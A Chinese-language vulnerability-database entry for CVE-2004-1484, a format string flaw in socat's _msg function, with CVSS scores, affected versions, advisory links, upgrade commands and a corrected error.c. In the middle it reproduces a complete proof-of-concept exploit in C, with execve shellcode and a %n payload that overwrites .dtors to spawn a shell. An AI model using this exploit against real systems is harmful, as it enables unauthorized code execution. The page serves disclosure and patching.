CVE-2004-1484
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:41:31
NMCOE    

[原文]Format string vulnerability in the _msg function in error.c in socat 1.4.0.3 and earlier, when used as an HTTP proxy client and run with the -ly option, allows remote attackers or local users to execute arbitrary code via format string specifiers in a syslog message.


[CNNVD]Socat远程格式字符串漏洞(CNNVD-200412-449)

        socat 1.4.0.3版本及之前版本的error.c中的_msg函数在被用作HTTP代理客户端并且带-ly运行时,存在格式字符串漏洞。远程攻击者或本地用户可以借助系统记录消息中的格式字符串说明符执行任意代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:socat:socat:1.0.4.2
cpe:/a:socat:socat:1.4.0.1
cpe:/a:socat:socat:1.3.0.1
cpe:/a:socat:socat:1.0.3.0
cpe:/a:socat:socat:1.4.0.2
cpe:/a:socat:socat:1.4.0.0
cpe:/a:socat:socat:1.1.0.1
cpe:/a:socat:socat:1.3.2.0
cpe:/a:socat:socat:1.3.2.2
cpe:/a:socat:socat:1.3.0.0
cpe:/a:socat:socat:1.2.0.0
cpe:/a:socat:socat:1.3.2.1
cpe:/a:socat:socat:1.0.4.1
cpe:/a:socat:socat:1.0.4.0
cpe:/a:socat:socat:1.1.0.0
cpe:/a:socat:socat:1.3.1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1484
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1484
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-449
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/17822
(PATCH)  XF  socat-format-string(17822)
http://www.securityfocus.com/bid/11505
(PATCH)  BID  11505
http://www.nosystem.com.ar/advisories/advisory-07.txt
(VENDOR_ADVISORY)  MISC  http://www.nosystem.com.ar/advisories/advisory-07.txt
http://www.gentoo.org/security/en/glsa/glsa-200410-26.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200410-26
http://secunia.com/advisories/12936/
(VENDOR_ADVISORY)  SECUNIA  12936
http://www.dest-unreach.org/socat/advisory/socat-adv-1.html
(VENDOR_ADVISORY)  CONFIRM  http://www.dest-unreach.org/socat/advisory/socat-adv-1.html

- 漏洞信息

Socat远程格式字符串漏洞
中危 格式化字符串
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        socat 1.4.0.3版本及之前版本的error.c中的_msg函数在被用作HTTP代理客户端并且带-ly运行时,存在格式字符串漏洞。远程攻击者或本地用户可以借助系统记录消息中的格式字符串说明符执行任意代码。

- 公告与补丁

        The vendor has released a new version of the package to address this issue:
        Gentoo has released an advisory (GLSA 200410-26) to address this issue. Please see the referenced advisory for more information. Gentoo users may carry out the following actions to update their computers:
        emerge --sync
        emerge --ask --oneshot --verbose ">=net-misc/socat-1.4.0.3"
        socat socat 1.0 .x
        
        socat socat 1.1 .x
        
        socat socat 1.2 .x
        
        socat socat 1.3 .x
        
        socat socat 1.4 .0.0
        
        socat socat 1.4 .0.1
        
        socat socat 1.4 .0.2
        

- 漏洞信息 (591)

socat <= 1.4.0.2 Local Format String Exploit (not setuid) (EDBID:591)
linux local
2004-10-23 Verified
0 CoKi
N/A [点击下载]
/* socat_exp.c

   Socat Format String Vulnerability

   socat <= 1.4.0.2 local exploit (Proof of Concept)

   Tested in Slackware 9.0 / 9.1 / 10.0

   by CoKi <coki@nosystem.com.ar>
   No System Group - http://www.nosystem.com.ar
   
coki@servidor:~$ make socat_exp
coki@servidor:~$ ./socat_exp

 socat <= 1.4.0.2 local exploit (Proof of Concept)
 by CoKi <coki@nosystem.com.ar>

 shellcode address = 0xbfffffb9
 .dtors address    = 0x080740c4

2004/10/19 09:49:46 socat[26197] E unknown syslog facility
"ÄÅÆÇ%142u%30$n%70u%31$n%256u%32$n%192u%33$n"
sh-2.05b$

This exploit does not give a root shell :(   
*/

#include <stdio.h>
#include <string.h>

#define PATH "/usr/local/bin/socat"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]=  /* aleph1 shellcode.45b */
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
        "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
        "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
        "\x2f\x73\x68";

int check(unsigned long addr);

int main(int argc, char *argv[]) {

        int i, dtorsaddr;
        unsigned int bal1, bal2, bal3, bal4;
        char temp[512];
        char buffer[1024];
        int cn1, cn2, cn3, cn4;
        FILE *f;
        char *env[3] = {shellcode, NULL};
        int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

        sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
        f = popen(temp, "r");
        if(fscanf(f, " %08x", &dtorsaddr) != 1) {
                pclose(f);
                printf("Cannot find .dtors address\n");
                exit(1);
        }
        pclose(f);
        dtorsaddr = dtorsaddr + 4;

        printf("\n socat <= 1.4.0.2 local exploit (Proof of Concept)\n");
        printf(" by CoKi <coki@nosystem.com.ar>\n\n");
        printf(" shellcode address = %.8p\n", shaddr);
        printf(" .dtors address    = %.8p\n\n", dtorsaddr);

        bzero(temp, sizeof(temp));
        bzero(buffer, sizeof(buffer));

        strcat(buffer, "-ly");

        for(i = 0; i < 4; i++) {
                bzero(temp, sizeof(temp));
                sprintf(temp, "%s", &dtorsaddr);
                strncat(buffer, temp, 4);
                dtorsaddr++;
        }

        bal1 = (shaddr & 0xff000000) >> 24;
        bal2 = (shaddr & 0x00ff0000) >> 16;
        bal3 = (shaddr & 0x0000ff00) >>  8;
        bal4 = (shaddr & 0x000000ff);

        cn1 = bal4 - 27 - 16;
        cn1 = check(cn1);
        cn2 = bal3 - bal4;
        cn2 = check(cn2);
        cn3 = bal2 - bal3;
        cn3 = check(cn3);
        cn4 = bal1 - bal2;
        cn4 = check(cn4);

        sprintf(temp, "%%%du%%30\$n%%%du%%31\$n%%%du%%32\$n%%%du%%33\$n", cn1, cn2, cn3, cn4);

        strcat(buffer, temp);

        execle(PATH, "socat", buffer, NULL, env);
}

int check(unsigned long addr) {
        char tmp[128];
        snprintf(tmp, sizeof(tmp), "%d", addr);
        if(atoi(tmp) < 1)
                addr = addr + 256;

        return addr;
}

// milw0rm.com [2004-10-23]
		

- 漏洞信息

11035
socat error.c _msg() Function Remote Format String
Local Access Required, Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

socat contains a flaw that may allow local or remote attackers to gain access to unauthorized privileges. A local attacker could trigger this issue when socat is listening on a UNIX domain socket, which could allow an attacker with permissions to connect to the socket to pass malicious data that could lead to arbitrary code execution. A remote attacker could trigger this issue when a system user runs socat as a HTTP proxy client and the attacker spoofs a proxy server to which socat connects. The attacker could then pass malicious data that could lead to arbitrary code execution. Both flaws may lead to a loss of integrity. Note: To successfully exploit either the local or the remote vulnerabilities, socat must be run with the "-ly" option enabled. Additionally, to exploit the local vulnerability socat must log with debug level 2 or higher.

- 时间线

2004-10-18 Unknow
2004-10-18 Unknow

- 解决方案

Upgrade to version 1.4.0.3 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): 1) Disable logging to syslog by not using the "-ly" option when starting socat. 2) Change the _msg() function in error.c to: --------------------- corrected error.c _msg() function --------------------- static void _msg(int level, const char *buff, const char *syslp) { if (diagopts.logstderr) { fputs(buff, stderr); fflush(stderr); } if (diagopts.syslog) { syslog(syslevel[level], "%s", syslp); // <--- here } if (diagopts.logfile) { fputs(buff, diagopts.logfile); fflush(diagopts.logfile); } } --------------------- corrected error.c _msg() function ---------------------

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站